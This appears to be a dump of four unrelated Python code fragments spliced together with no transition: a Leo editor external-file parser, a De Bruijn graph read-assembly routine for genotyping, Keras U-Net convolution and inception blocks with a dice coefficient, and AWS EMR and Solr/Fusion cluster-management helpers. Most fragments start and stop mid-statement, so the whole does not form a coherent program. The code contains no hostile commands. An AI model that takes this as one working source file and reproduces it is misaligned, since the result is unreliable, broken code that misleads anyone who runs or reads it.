body = gnx2body.get(key)
v = gnx2vnode.get(key)
assert v, (key, v)
v._bodyString = g.toUnicode(''.join(body))
#@+node:ekr.20180602103135.2: *3* fast_at.scan_header
header_pattern = re.compile(r'''
^(.+)@\+leo
(-ver=(\d+))?
(-thin)?
(-encoding=(.*)(\.))?
(.*)$''', re.VERBOSE)
def scan_header(self, lines):
'''
Scan for the header line, which follows any @first lines.
Return (delims, first_lines, i+1) or None
'''
first_lines = []
i = 0 # To keep some versions of pylint happy.
for i, line in enumerate(lines):
m = self.header_pattern.match(line)
if m:
delims = m.group(1), m.group(8) or ''
return delims, first_lines, i+1
first_lines.append(line)
return None
#@+node:ekr.20180602103135.8: *3* fast_at.scan_lines
def scan_lines(self, delims, first_lines, lines, start, test=False):
'''Scan all lines of the file, creating vnodes.'''
#@+<< init scan_lines >>
#@+node:ekr.20180602103135.9: *4* << init scan_lines >>
#
# Simple vars...
afterref = False
# A special verbatim line follows @afterref.
clone_v = None
# The root of the clone tree.
# When not None, we are scanning a clone and all it's descendants.
delim_start, delim_end = delims
# The start/end delims.
doc_skip = (delim_start + '\n', delim_end + '\n')
# To handle doc parts.
first_i = 0
# Index into first array.
in_doc = False
# True: in @doc parts.
in_raw = False
# True: @raw seen.
is_cweb = delim_start == '@q@' and delim_end == '@>'
# True: cweb hack in effect.
indent = 0
# The current indentation.
level_stack = []
# Entries are (vnode, in_clone_tree)
n_last_lines = 0
# The number of @@last directives seen.
root_seen = False
# False: The next +@node sentinel denotes the root, regardless of gnx.
# Needed to handle #1065 so reads will not create spurious child nodes.
sentinel = delim_start + '@'
# Faster than a regex!
stack = []
# Entries are (gnx, indent, body)
# Updated when at+others, at+<section>, or at+all is seen.
verbline = delim_start + '@verbatim' + delim_end + '\n'
# The spelling of at-verbatim sentinel
verbatim = False
# True: the next line must be added without change.
#
# Init the data for the root node.
#
#
# Init the parent vnode for testing.
#
if self.test:
root_gnx = gnx = 'root-gnx'
# The node that we are reading.
# start with the gnx for the @file node.
gnx_head = '<hidden top vnode>'
# The headline of the root node.
context = None
parent_v = self.VNode(context=context, gnx=gnx)
parent_v._headString = gnx_head
# Corresponds to the @files node itself.
else:
# Production.
root_gnx = gnx = self.root.gnx
context = self.c
parent_v = self.root.v
root_v = parent_v
# Does not change.
level_stack.append((root_v, False),)
#
# Init the gnx dict last.
#
gnx2vnode = self.gnx2vnode
# Keys are gnx's, values are vnodes.
gnx2body = {}
# Keys are gnxs, values are list of body lines.
gnx2vnode[gnx] = parent_v
# Add gnx to the keys
gnx2body[gnx] = body = first_lines
# Add gnx to the keys.
# Body is the list of lines presently being accumulated.
#
# get the patterns.
after_pat, all_pat, code_pat, comment_pat, delims_pat,\
doc_pat, end_raw_pat, first_pat, last_pat, \
node_start_pat, others_pat, raw_pat, ref_pat = self.get_patterns(delims)
#@-<< init scan_lines >>
#@+<< define dump_v >>
#@+node:ekr.20180613061743.1: *4* << define dump_v >>
def dump_v():
'''Dump the level stack and v.'''
print('----- LEVEL', level, v.h)
print(' PARENT', parent_v.h)
print('[')
for i, data in enumerate(level_stack):
v2, in_tree = data
print('%2s %5s %s' % (i+1, in_tree, v2.h))
print(']')
print('PARENT.CHILDREN...')
g.printObj([v3.h for v3 in parent_v.children])
print('PARENTS...')
g.printObj([v4.h for v4 in v.parents])
#@-<< define dump_v >>
i = 0 # To keep pylint happy.
for i, line in enumerate(lines[start:]):
# Order matters.
#@+<< 1. common code for all lines >>
#@+node:ekr.20180602103135.10: *4* << 1. common code for all lines >>
if verbatim:
# We are in raw mode, or other special situation.
# Previous line was verbatim sentinel. Append this line as it is.
if afterref:
afterref = False
if body: # a List of lines.
body[-1] = body[-1].rstrip() + line
else:
body = [line]
verbatim = False
elif in_raw:
m = end_raw_pat.match(line)
if m:
in_raw = False
verbatim = False
else:
body.append(line)
# Continue verbatim/raw mode.
else:
body.append(line)
verbatim = False
continue
if line == verbline: # <delim>@verbatim.
verbatim = True
continue
#
# Strip the line only once.
strip_line = line.strip()
#
# Undo the cweb hack.
if is_cweb and line.startswith(sentinel):
line = line[:len(sentinel)] + line[len(sentinel):].replace('@@', '@')
# Adjust indentation.
if indent and line[:indent].isspace() and len(line) > indent:
line = line[indent:]
#@-<< 1. common code for all lines >>
#@+<< 2. short-circuit later tests >>
#@+node:ekr.20180602103135.12: *4* << 2. short-circuit later tests >>
# This is valid because all following sections are either:
# 1. guarded by 'if in_doc' or
# 2. guarded by a pattern that matches the start of the sentinel.
#
if not in_doc and not strip_line.startswith(sentinel):
# lstrip() is faster than using a regex!
body.append(line)
continue
#@-<< 2. short-circuit later tests >>
#@+<< 3. handle @others >>
#@+node:ekr.20180602103135.14: *4* << 3. handle @others >>
m = others_pat.match(line)
if m:
in_doc = False
if m.group(2) == '+': # opening sentinel
body.append('%s@others%s\n' % (m.group(1), m.group(3) or ''))
stack.append((gnx, indent, body))
indent += m.end(1) # adjust current identation
else: # closing sentinel.
# m.group(2) is '-' because the pattern matched.
gnx, indent, body = stack.pop()
continue
#@-<< 3. handle @others >>
#@afterref
# clears in_doc
#@+<< 4. handle section refs >>
#@+node:ekr.20180602103135.18: *4* << 4. handle section refs >>
m = ref_pat.match(line)
if m:
in_doc = False
if m.group(2) == '+':
# open sentinel.
body.append(m.group(1) + g.angleBrackets(m.group(3)) + '\n')
stack.append((gnx, indent, body))
indent += m.end(1)
else:
# close sentinel.
# m.group(2) is '-' because the pattern matched.
gnx, indent, body = stack.pop()
continue
#@-<< 4. handle section refs >>
#@afterref
# clears in_doc.
# Order doesn't matter, but match more common sentinels first.
#@+<< handle node_start >>
#@+node:ekr.20180602103135.19: *4* << handle node_start >>
m = node_start_pat.match(line)
if m:
in_doc, in_raw = False, False
gnx, head = m.group(2), m.group(5)
level = int(m.group(3)) if m.group(3) else 1 + len(m.group(4))
# m.group(3) is the level number, m.group(4) is the number of stars.
v = gnx2vnode.get(gnx)
#
# Case 1: The root @file node. Don't change the headline.
if not root_seen:
# Fix #1064: The node represents the root, regardless of the gnx!
root_seen = True
clone_v = None
gnx2body[gnx] = body = []
if not v:
# Fix #1064.
v = root_v
# This message is annoying when using git-diff.
# if gnx != root_gnx:
# g.es_print("using gnx from external file: %s" % | |
range(len(vertice_count) - 2):
v = vertice_with_id[v][1]
num_ids = vertices[v][3]
delete_ids |= set(num_ids)
if debug_msg:
print >> sys.stderr, v, "is removed with", num_ids
else:
for v in range(len(vertices)):
assert len(vertices) >= 2
relative_avg = (sum(vertice_count) - vertice_count[v]) / float(len(vertice_count) - 1)
if len(vertices) == 2:
# Eliminate reads that have conflicts with other reads due to a deletion
if vertice_count[v] * 2 < relative_avg:
nt, kmer, _, num_ids = vertices[1-v]
if nt == 'D':
num_id = num_ids[0]
read_id = num_to_id[num_id]
left, seq = pos - self.nodes[read_id].left, node_seq[read_id]
seq_right = ''.join(seq[left+k:])
seq_right = seq_right.replace('D', '')
success = True
for num_id2 in vertices[v][3]:
read_id2 = num_to_id[num_id2]
left2, seq2 = pos-self.nodes[read_id2].left, node_seq[read_id2]
seq2_right = ''.join(seq2[left2+k:])
if seq_right.find(seq2_right) != 0:
success = False
break
if success:
delete_ids |= set(vertices[v][3])
# DK - working on ...
if DRB1_debug:
if vertice_count[v] * 8 < relative_avg:
num_ids = vertices[v][3]
delete_ids |= set(num_ids)
if debug_msg:
print >> sys.stderr, v, "is removed with", num_ids
elif vertice_count[v] * 8 < avg_kmers:
num_ids = vertices[v][3]
delete_ids |= set(num_ids)
else:
if vertice_count[v] * 3 < relative_avg:
num_ids = vertices[v][3]
delete_ids |= set(num_ids)
if debug_msg:
print >> sys.stderr, v, "is removed with", num_ids
if debug_msg:
print >> sys.stderr
print >> sys.stderr
if len(delete_ids) == 0:
if try_hard:
break
else:
try_hard = True
for num_id in delete_ids:
read_id = num_to_id[num_id]
del self.nodes[read_id]
# Print De Bruijn graph
# """
# for i in range(len(debruijn)):
for i in range(len(debruijn)):
curr_vertices = debruijn[i]
if len(curr_vertices) == 0:
continue
consensus_seq = [{} for j in range(k)]
for v in range(len(curr_vertices)):
nt, k_m1_mer = curr_vertices[v][:2]
kmer = k_m1_mer + nt
assert len(kmer) == k
for j in range(k):
nt = kmer[j]
if nt not in consensus_seq[j]:
consensus_seq[j][nt] = 1
else:
consensus_seq[j][nt] += 1
if print_msg: print >> sys.stderr, i
for v in range(len(curr_vertices)):
nt, k_m1_mer, predecessors, num_ids = curr_vertices[v]
kmer = k_m1_mer + nt
kmer_seq = ""
for j in range(k):
nt = kmer[j]
if len(consensus_seq[j]) >= 2:
kmer_seq += "\033[94m"
kmer_seq += nt
if len(consensus_seq[j]) >= 2:
kmer_seq += "\033[00m"
if print_msg: print >> sys.stderr, "\t%d:" % v, kmer_seq, len(num_ids), predecessors, num_ids
# """
# Generate compressed nodes
paths = []
path_queue, done = deque(), set()
for i in range(len(debruijn)):
if len(debruijn[i]) == 0:
continue
for i2 in range(len(debruijn[i])):
path_queue.append("%d-%d" % (i, i2))
break
while len(path_queue) > 0:
i_str = path_queue.popleft()
if i_str in done:
continue
i, i2 = i_str.split('-')
i, i2 = int(i), int(i2)
num_ids = debruijn[i][i2][3]
j = i + 1
while j < len(debruijn):
merge, branch = len(debruijn[j-1]) > len(debruijn[j]), len(debruijn[j-1]) < len(debruijn[j])
new_i2 = -1
tmp_num_ids = []
found = False
for j2 in range(len(debruijn[j])):
_, _, predecessors, add_read_ids = debruijn[j][j2]
if len(predecessors) == 0:
branch = True
path_queue.append("%d-%d" % (j, j2))
elif i2 in predecessors:
found = True
# merge into one node
if len(predecessors) > 1:
merge = True
if new_i2 >= 0:
branch = True
new_i2 = j2
tmp_num_ids += add_read_ids
if merge or branch:
for j2 in range(len(debruijn[j])):
_, _, predecessors, add_num_ids = debruijn[j][j2]
if i2 in predecessors:
path_queue.append("%d-%d" % (j, j2))
break
if not found:
break
num_ids += tmp_num_ids
i2 = new_i2
j += 1
done.add(i_str)
num_ids = set(num_ids)
paths.append([i, j, num_ids])
if j < len(debruijn) and len(debruijn[j]) == 0:
j += 1
while j < len(debruijn) and len(debruijn[j]) == 0:
j += 1
if j < len(debruijn):
for j2 in range(len(debruijn[j])):
path_queue.append("%d-%d" % (j, j2))
def get_mate_num_ids(num_ids):
mate_num_ids = set()
for num_id in num_ids:
read_id = num_to_id[num_id]
mate_read_id = get_mate_node_id(read_id)
if mate_read_id in id_to_num:
mate_num_id = id_to_num[mate_read_id]
mate_num_ids.add(mate_num_id)
return mate_num_ids
# Generate a compressed assembly graph
def path_cmp(a, b):
if a[0] != b[0]:
return a[0] - b[0]
else:
return a[1] - b[1]
paths = sorted(paths, cmp=path_cmp)
# DK - debugging purposes
for p in range(len(paths)):
if print_msg: print >> sys.stderr, "path:", p, paths[p]
excl_num_ids = set() # exclusive num ids
equiv_list = []
p = 0
while p < len(paths):
left, right, num_ids = paths[p]
p2 = p + 1
while p2 < len(paths):
next_left, next_right, next_num_ids = paths[p2]
if next_left >= right:
break
p2 += 1
equiv_list.append([])
for i in range(p, p2):
left, right, num_ids = paths[i]
equiv_list[-1].append([[i], num_ids, num_ids | get_mate_num_ids(num_ids), []])
if p + 1 < p2:
assert p + 2 == p2
excl_num_ids |= num_ids
p = p2
new_equiv_list = []
for classes in equiv_list:
if len(classes) > 1:
new_equiv_list.append(classes)
continue
assert len(classes) == 1
num_ids = classes[0][1] - excl_num_ids
if len(num_ids) <= 0:
continue
classes[0][1] = num_ids
classes[0][2] = num_ids | get_mate_num_ids(num_ids)
new_equiv_list.append(classes)
equiv_list = new_equiv_list
known_alleles = False
while True:
# DK - debugging purposes
# """
for i in range(len(equiv_list)):
classes = equiv_list[i]
for j in range(len(classes)):
ids, num_ids, all_ids, alleles = classes[j]
if print_msg: print >> sys.stderr, i, j, ids, len(num_ids), sorted(list(num_ids))[:20], alleles
if print_msg: print >> sys.stderr
# """
if known_alleles:
for i in range(len(equiv_list)):
classes = equiv_list[i]
for j in range(len(classes)):
num_ids = sorted(list(classes[j][1]))
node_id = "(%d-%d)%s" % (i, j, num_to_id[num_ids[0]])
node = self.nodes2[node_id]
node_vars = node.get_var_ids()
max_alleles, max_common = set(), -sys.maxint
for anode in self.predicted_allele_nodes.values():
allele_vars = anode.get_var_ids(node.left, node.right)
tmp_common = len(set(node_vars) & set(allele_vars)) - len(set(node_vars) | set(allele_vars))
if tmp_common > max_common:
max_common = tmp_common
max_alleles = set([anode.id])
elif tmp_common == max_common:
max_alleles.add(anode.id)
classes[j][3] = max_alleles
best_common_mat, best_stat, best_i, best_i2 = [], -sys.maxint, -1, -1
for i in range(len(equiv_list) - 1):
classes = equiv_list[i]
for i2 in range(i + 1, len(equiv_list)):
classes2 = equiv_list[i2]
common_mat = []
for j in range(len(classes)):
common_mat.append([])
if known_alleles:
ids = classes[j][3]
else:
ids = classes[j][2]
for j2 in range(len(classes2)):
if known_alleles:
ids2 = classes2[j2][3]
else:
ids2 = classes2[j2][2]
common_mat[-1].append(len(ids & ids2))
# Calculate stat
common_stat = 0
if len(classes) == 1 or len(classes2) == 1:
for row in common_mat:
common_stat += sum(row)
else:
for row in common_mat:
sorted_row = sorted(row, reverse=True)
common_stat += (sorted_row[0] - sorted_row[1])
if common_mat[0][0] + common_mat[1][1] == \
common_mat[1][0] + common_mat[0][1]:
common_stat = -1
if common_stat > best_stat:
best_common_mat, best_stat, best_i, best_i2 = common_mat, common_stat, i, i2
# DK - debugging purposes
# """
if print_msg:
print >> sys.stderr, "best:", best_i, best_i2, best_stat, best_common_mat
print >> sys.stderr
print >> sys.stderr
# """
if known_alleles and best_stat < 0:
self.remove_nodes(self.nodes2)
break
if best_stat < 0:
known_alleles = True
new_nodes = {}
for i in range(len(equiv_list)):
classes = equiv_list[i]
for j in range(len(classes)):
ids, num_ids, all_ids, alleles = classes[j]
num_ids = sorted(list(num_ids))
# DK - debugging purposes
if print_msg: print >> sys.stderr, i, j, num_ids
assert (num_ids) > 0
read_id = num_to_id[num_ids[0]]
node = deepcopy(self.nodes[read_id])
for num_id2 in num_ids[1:]:
read_id2 = num_to_id[num_id2]
node2 = self.nodes[read_id2]
node.combine_with(node2)
new_read_id = "(%d-%d)%s" % (i, j, read_id)
node.id = new_read_id
new_read_id not in new_nodes
new_nodes[new_read_id] = node
self.nodes = new_nodes
self.nodes2 = deepcopy(self.nodes)
self.remove_nodes(self.nodes)
continue
# DK - for the moment
mat = best_common_mat
classes, classes2 = equiv_list[best_i], equiv_list[best_i2]
# Filter vertices further if necessary
def del_row(classes, mat, r):
return classes[:r] + classes[r+1:], mat[:r] + mat[r+1:]
def del_col(classes, mat, c):
new_mat = []
for row in mat:
row = row[:c] + row[c+1:]
new_mat.append(row)
return classes[:c] + classes[c+1:], new_mat
assert len(classes) <= 2 and len(classes2) <= 2
if len(classes) == 2 and len(classes2) == 2:
# Check row
num_ids1, num_ids2 = len(classes[0][1]), len(classes[1][1])
if num_ids1 * 6 < num_ids2 or num_ids2 * 6 < num_ids1:
row_sum1, row_sum2 = sum(mat[0]), sum(mat[1])
if row_sum1 > max(2, row_sum2 * 6):
classes, mat = del_row(classes, mat, 1)
classes[0][1] -= excl_num_ids
elif row_sum2 > max(2, row_sum1 * 6):
classes, mat = del_row(classes, mat, 0)
classes[0][1] -= excl_num_ids
# Check column
if len(classes) == 2:
num_ids1, num_ids2 = len(classes2[0][1]), len(classes2[1][1])
if num_ids1 * 6 < num_ids2 or num_ids2 * 6 < num_ids1:
col_sum1, col_sum2 = mat[0][0] + mat[1][0], mat[0][1] + mat[1][1]
if col_sum1 > max(2, col_sum2 | |
equal-sized masks.
Used for testing on artificially generated np.arrays
Dice Coefficient: https://en.wikipedia.org/wiki/S%C3%B8rensen%E2%80%93Dice_coefficient
Need smooth, because otherwise 2 empty (all zeros) masks will throw an error instead of giving 1 as an output.
:param mask_1: first mask
:param mask_2: second mask
:param smooth: Smoothing parameter for dice coefficient
:return: Smoothened dice coefficient between two equal-sized masks
"""
tr = mask_1.flatten()
pr = mask_2.flatten()
return (2. * np.sum(tr * pr) + smooth) / (np.sum(tr) + np.sum(pr) + smooth)
# ----------------------------------------------------------------------------------------------------------------------
if __name__ == '__main__':
a = np.random.random((420, 100))
b = np.random.random((420, 100))
res = np_dice_coef(a, b)
print(res)
########################################################################################################################
# ======================================================================================================================
# u_model_blocks
# ======================================================================================================================
########################################################################################################################
# needed for u_model
# standard-module imports
from keras.layers import add, concatenate, Conv2D, MaxPooling2D
from keras.layers import BatchNormalization, Lambda
from keras.layers.advanced_activations import ELU, LeakyReLU
# ======================================================================================================================
# utility blocks needed for internal performance
# ======================================================================================================================
def NConv2D(filters, kernel_size, strides=(1, 1), padding='valid', dilation_rate=1,
activation=None, kernel_initializer='glorot_uniform'):
"""Create a (Normalized Conv2D followed by a chosen activation) function
Conv2D -> BatchNormalization -> activation()
:param filters: Integer, the dimensionality of the output space (i.e. the number of output filters in the
convolution)
:param kernel_size: An integer or tuple/list of 2 integers, specifying the height and width of the 2D convolution
window. Can be a single integer to specify the same value for all spatial dimensions.
:param strides: An integer or tuple/list of 2 integers, specifying the strides of the convolution along the height
and width. Can be a single integer to specify the same value for all spatial dimensions.
Specifying any stride value != 1 is incompatible with specifying any dilation_rate value != 1.
:param padding: one of 'valid' or 'same' (case-insensitive), 'valid' by default to have the same as Conv2D
:param dilation_rate: an integer or tuple/list of a single integer, specifying the dilation rate
to use for dilated convolution. Currently, specifying any dilation_rate value != 1
is incompatible with specifying any strides value != 1
:param activation: string, one of 'elu' or 'relu' or None (case-sensitive),
specifies activation function to be performed after BatchNormalization
:param kernel_initializer: Initializer for the kernel weights matrix (see initializers in keras documentation)
:return: a function, combined of 2D Convolution, followed by BatchNormalization across filters,
and specified activation in that order
"""
assert activation in ['relu', 'elu', None]
# actv is a function, not a string, like activation
actv = activation == 'relu' and (lambda: LeakyReLU(0.0)) or activation == 'elu' and (lambda: ELU(1.0)) or None
def f(_input):
conv = Conv2D(filters=filters, kernel_size=kernel_size, strides=strides, padding=padding,
dilation_rate=dilation_rate, kernel_initializer=kernel_initializer)(_input)
norm = BatchNormalization(axis=3)(conv)
return actv()(norm)
return f
# needed for rblock (residual block)
def _shortcut(_input, residual):
stride_width = _input._keras_shape[1] / residual._keras_shape[1]
stride_height = _input._keras_shape[2] / residual._keras_shape[2]
equal_channels = residual._keras_shape[3] == _input._keras_shape[3]
shortcut = _input
# 1 X 1 conv if shape is different. Else identity.
if stride_width > 1 or stride_height > 1 or not equal_channels:
shortcut = Conv2D(filters=residual._keras_shape[3], kernel_size=(1, 1),
strides=(stride_width, stride_height),
kernel_initializer="he_normal", padding="valid")(_input)
return add([shortcut, residual])
def rblock(inputs, filters, kernel_size, padding='valid', activation=None, scale=0.1):
"""Create a scaled Residual block connecting the down-path and the up-path of the u-net architecture
Activations are scaled by a constant to prevent the network from dying. Usually is set between 0.1 and 0.3. See:
https://towardsdatascience.com/a-simple-guide-to-the-versions-of-the-inception-network-7fc52b863202
:param inputs: Input 4D tensor (samples, rows, cols, channels)
:param filters: Integer, the dimensionality of the output space (i.e. the number of output convolution filters)
:param kernel_size: An integer or tuple/list of 2 integers, specifying the height and width of the 2D convolution
window. Can be a single integer to specify the same value for all spatial dimensions.
:param padding: one of 'valid' or 'same' (case-insensitive), 'valid' by default to have the same as Conv2D
:param activation: string, one of 'elu' or 'relu' or None (case-sensitive),
specifies activation function to use everywhere in the block
:param scale: scaling factor preventing the network from dying out
:return: 4D tensor (samples, rows, cols, channels) output of a residual block, given inputs
"""
assert activation in ['relu', 'elu', None]
# actv is a function, not a string, like activation
actv = activation == 'relu' and (lambda: LeakyReLU(0.0)) or activation == 'elu' and (lambda: ELU(1.0)) or None
residual = Conv2D(filters=filters, kernel_size=kernel_size, padding=padding)(inputs)
residual = BatchNormalization(axis=3)(residual)
residual = Lambda(lambda x: x * scale)(residual)
res = _shortcut(inputs, residual)
return actv()(res)
# ======================================================================================================================
# information blocks
# ======================================================================================================================
def convolution_block(inputs, filters, kernel_size=(3, 3), padding='valid', activation=None,
version='normalized', pars={}, allowed_pars={}):
"""Create a version of a convolution block.
Versions: with and without batch-normalization after convolutions.
:param inputs: Input 4D tensor (samples, rows, cols, channels)
:param filters: Integer, the dimensionality of the output space (i.e. the number of output filters in the
convolution).
:param kernel_size: An integer or tuple/list of 2 integers, specifying the height and width of the 2D convolution
window. Can be a single integer to specify the same value for all spatial dimensions.
:param padding: one of 'valid' or 'same' (case-insensitive), 'valid' by default to have the same as Conv2D
:param activation: string, specifies activation function to use everywhere in the block
:param version: version of the convolution block, one of 'not_normalized', 'normalized' (case sensitive)
:param pars: dictionary of parameters passed to u-net, determines the version, if this type of block is chosen
:param allowed_pars: dictionary of all allowed to be passed to u-net parameters
:return: 4D tensor (samples, rows, cols, channels) output of a convolution block, given inputs
"""
assert activation in ['relu', 'elu', None]
# checking that the allowed version names did not change in ALLOWED_PARS
if allowed_pars != {}:
assert allowed_pars.get('information_block').get('convolution').get('simple') == ['not_normalized',
'normalized']
# keep version argument if need to use without PARS
assert version in ['not_normalized', 'normalized']
# setting the version from pars
if pars.get('information_block').get('convolution').get('simple') is not None:
version = pars.get('information_block').get('convolution').get('simple')
if version == 'normalized':
conv1 = NConv2D(filters=filters, kernel_size=kernel_size, activation=activation, padding=padding)(inputs)
return NConv2D(filters=filters, kernel_size=kernel_size, activation=activation, padding=padding)(conv1)
else:
conv1 = Conv2D(filters=filters, kernel_size=kernel_size, activation=activation, padding=padding)(inputs)
return Conv2D(filters=filters, kernel_size=kernel_size, activation=activation, padding=padding)(conv1)
def dilated_convolution_block(inputs, filters, kernel_size=(3, 3), padding='valid', activation=None,
version='normalized', pars={}, allowed_pars={}):
"""Create a version of a dilated-convolution block.
Versions: with and without batch-normalization after dilated convolutions.
See more about dilated convolutions:
https://towardsdatascience.com/review-dilated-convolution-semantic-segmentation-9d5a5bd768f5
:param inputs: Input 4D tensor (samples, rows, cols, channels)
:param filters: Integer, the dimensionality of the output space (i.e. the number of output filters in the
convolution).
:param kernel_size: An integer or tuple/list of 2 integers, specifying the height and width of the 2D convolution
window. Can be a single integer to specify the same value for all spatial dimensions.
:param padding: one of 'valid' or 'same' (case-insensitive), 'valid' by default to have the same as Conv2D
:param activation: string, specifies activation function to use everywhere in the block
:param version: version of the dilated-convolution block, one of 'not_normalized', 'normalized' (case sensitive)
:param pars: dictionary of parameters passed to u-net, determines the version, if this type of block is chosen
:param allowed_pars: dictionary of all allowed to be passed to u-net parameters
:return: 4D tensor (samples, rows, cols, channels) output of a dilated-convolution block, given inputs
"""
assert activation in ['relu', 'elu', None]
# checking that the allowed version names did not change in ALLOWED_PARS
if allowed_pars != {}:
assert allowed_pars.get('information_block').get('convolution').get('dilated') == ['not_normalized',
'normalized']
# keep version argument if need to use without PARS
assert version in ['not_normalized', 'normalized']
# setting the version from pars
if pars.get('information_block').get('convolution') is not None:
version = pars.get('information_block').get('convolution')
if version == 'normalized':
conv1 = NConv2D(filters=filters, kernel_size=kernel_size, padding=padding,
dilation_rate=2, activation=activation)(inputs)
return NConv2D(filters=filters, kernel_size=kernel_size, padding=padding,
dilation_rate=1, activation=activation)(conv1)
else:
conv1 = Conv2D(filters=filters, kernel_size=kernel_size, padding=padding,
dilation_rate=2, activation=activation)(inputs)
return Conv2D(filters=filters, kernel_size=kernel_size, padding=padding,
dilation_rate=1, activation=activation)(conv1)
def inception_block_v1(inputs, filters, activation=None, version='b', pars={}, allowed_pars={}):
"""Create a version of v1 inception block described in:
https://towardsdatascience.com/a-simple-guide-to-the-versions-of-the-inception-network-7fc52b863202
Create an inception block described in v1, sections 'a' (for naive version), or 'b' (with dimension reduction)
Each version has 4 verticals in their structure. See the link above.
For all versions, verticals 1 and 2 of the block start with 2D convolution, which:
reduces the number of input filters to next convolutions (to make computation cheaper)
uses (1, 1) kernels, no Normalization
is NOT normalized
is followed by | |
found in Solr!')
earliestDoc = results.docs[0][timestampField]
earliestTime = dateutil.parser.parse(earliestDoc)
results = solr.search(timestampField+':[* TO *]', **{'sort':timestampField+' DESC'})
latestTime = dateutil.parser.parse(results.docs[0][timestampField])
duration = (latestTime-earliestTime).total_seconds()
tp = 0
if duration > 0:
tp = results.hits / duration
return tp
def _wait_for_emr_step_to_finish(emr, job_flow_id, stepId, stepName, maxWaitSecs=1800):
isDone = False
waitTime = 0
startedAt = time.time()
maxWait = int(maxWaitSecs)
loops = 0
stepState = 'UNKNOWN'
_status('Waiting up to %d seconds to see step %s complete for job flow %s' % (maxWait, stepName, job_flow_id))
while isDone is False and waitTime < maxWait:
stepState = emr.describe_step(job_flow_id, stepId).status.state
if stepState != 'RUNNING' and stepState != 'STARTING' and stepState != 'PENDING':
isDone = True
break
time.sleep(30)
waitTime = round(time.time() - startedAt)
if loops > 0 and loops % 2 == 0:
_status('Waited %d seconds so far for step %s to complete ... last state was %s' % (waitTime, stepName, stepState))
loops += 1
if isDone:
_info('Step %s %s in ~%d seconds' % (stepName, stepState, waitTime))
else:
_error('Step %s failed to complete within %d seconds!' % (stepName, maxWait))
return stepState
def _wait_to_see_fusion_proxy_up(cluster, host, maxWaitSecs=30):
waitTime = 0
startedAt = time.time()
isRunning = False
maxWait = int(maxWaitSecs)
hostAndPort = host+':8764'
while isRunning is False and waitTime < maxWait:
isRunning = _is_fusion_proxy_up(hostAndPort)
if isRunning:
break
if isRunning is False:
time.sleep(10)
waitTime = round(time.time() - startedAt)
_status('Waited %d seconds so far to verify Fusion proxy is running on %s.' % (waitTime, hostAndPort))
return isRunning
def _is_fusion_proxy_up(hostAndPort):
isProxyUp = False
try:
urllib2.urlopen('http://%s/' % hostAndPort+'/api')
_info('Fusion proxy at ' + hostAndPort + ' is online.')
isProxyUp = True
except urllib2.HTTPError as e:
print(str(e))
isProxyUp = False
except:
print(str(sys.exc_info()[0]))
isProxyUp = False
return isProxyUp
def _wait_to_see_fusion_api_up(cluster, apiHost, maxWait):
waitTime = 0
startedAt = time.time()
isRunning = False
if maxWait > 10:
_status('Will wait up to '+str(maxWait)+' secs to see Fusion API service up on host: '+apiHost)
fusionVers = _env(cluster, 'fusion_vers', defaultValue='3.1.0')
path = 'system/ping'
while isRunning is False and waitTime < int(maxWait):
isRunning = False
try:
statusResp = _fusion_api(apiHost, path)
# if we get here, api is responding ...
if statusResp == "pong":
isRunning = True
else:
_error('ping '+apiHost+' returned: '+statusResp)
except:
# make it JSON
statusResp = '{ "error": "'+str(sys.exc_info()[0])+'" }'
_warn('ping '+apiHost+' failed due to '+statusResp+'! Check status of Fusion and retry')
if isRunning:
break
if isRunning is False and int(maxWait) >= 15:
time.sleep(15)
waitTime = round(time.time() - startedAt)
_status('Waited %d seconds so far to verify Fusion API is running on %s.' % (waitTime, apiHost))
else:
_status('Fusion API service is not running due to: '+statusResp)
break
return isRunning
def _lookup_emr_job_flow_id(emrApi, emrCluster):
sstk_cfg = _get_config()
job_flow_id = None
if sstk_cfg.has_key('emr'):
emr = sstk_cfg['emr']
if emr.has_key(emrCluster):
clust = emr[emrCluster]
if clust.has_key('job_flow_id'):
job_flow_id = clust['job_flow_id']
if job_flow_id is None:
list = emrApi.list_clusters()
if list is not None:
for csl in list.clusters:
if csl.name == emrCluster:
job_flow_id = csl.id
if job_flow_id is not None:
if sstk_cfg.has_key('emr') is False:
sstk_cfg['emr'] = {}
if sstk_cfg['emr'].has_key(emrCluster) is False:
sstk_cfg['emr'][emrCluster] = {}
sstk_cfg['emr'][emrCluster]['job_flow_id'] = job_flow_id
_save_config()
if job_flow_id is None:
_fatal('Cannot find job flow ID for EMR cluster named '+emrCluster)
return job_flow_id
def _resolve_vpc_subnetid(cluster,az):
vpcSubnetId = _env(cluster, "vpc_subnetid", "")
if vpcSubnetId == "":
vpcSubnetId = None #reset
_status('No VPC subnet ID configured ... looking up best available option in the '+az+' availability zone ...')
vpc = boto.vpc.connect_to_region(az[0:len(az)-1])
for sn in vpc.get_all_subnets(filters={"availabilityZone":[az]}):
vpcSubnetId = sn.id
_status('Found '+vpcSubnetId+' in the '+az+' availability zone')
break
if vpcSubnetId is None:
_fatal('Cannot determine VPC subnet ID for launching EC2 instances in '+az+' Please set the vpc_subnetid property in your ~/.sstk file.')
return vpcSubnetId
def _defaultvpc_exists(region='us-west-2'):
vpc = boto.vpc.connect_to_region(region)
vpc.get_all_vpcs()
ret = False
for i in vpc.get_all_vpcs():
print(str(i))
if i.is_default:
ret = True
break
_status("Default VPC exists:" + str(ret))
return ret
def _get_collection_state(cluster,collection):
cloud = _provider_api(cluster)
hosts = _cluster_hosts(cloud, cluster)
zkhost = _read_cloud_env(cluster)["ZK_HOST"]
fusionHome = _env(cluster, 'fusion_home')
collection_state_znode_path = "/collections/{}/state.json".format(collection)
output_path = "{}_state.json".format(collection)
script_command = "{}/scripts/zkImportExport.sh -z {} -cmd export -path {} -e utf-8 -f {}"\
.format(fusionHome, zkhost, collection_state_znode_path, output_path)
state = None
with settings(host_string=hosts[0]), hide('output', 'running'):
# _info("Getting collection state using command {} on host {}".format(script_command, hosts[0]))
run("rm -rf {}".format(output_path))
run(script_command)
output = run("cat {}".format(output_path))
out_json = json.loads(output)
if "response" in out_json:
if "data" in out_json["response"]:
state = json.loads(out_json["response"]["data"])
if state is None:
_fatal("Failed to get Solr state from import export script. Output: " + out_json)
if state:
shards_state = state[collection]["shards"]
host_shard_mapping = {}
for shard in shards_state:
replicas = shards_state[shard]["replicas"]
for core in replicas:
core_status = replicas[core]
if "leader" in core_status and core_status["leader"] == "true":
node_name = core_status["node_name"][:-10]
leader_state = {"node": node_name, "core": core_status["core"]}
host_shard_mapping[shard] = leader_state
return host_shard_mapping
else:
_fatal("Failed to get Solr state from import export script using command '" + script_command + "'")
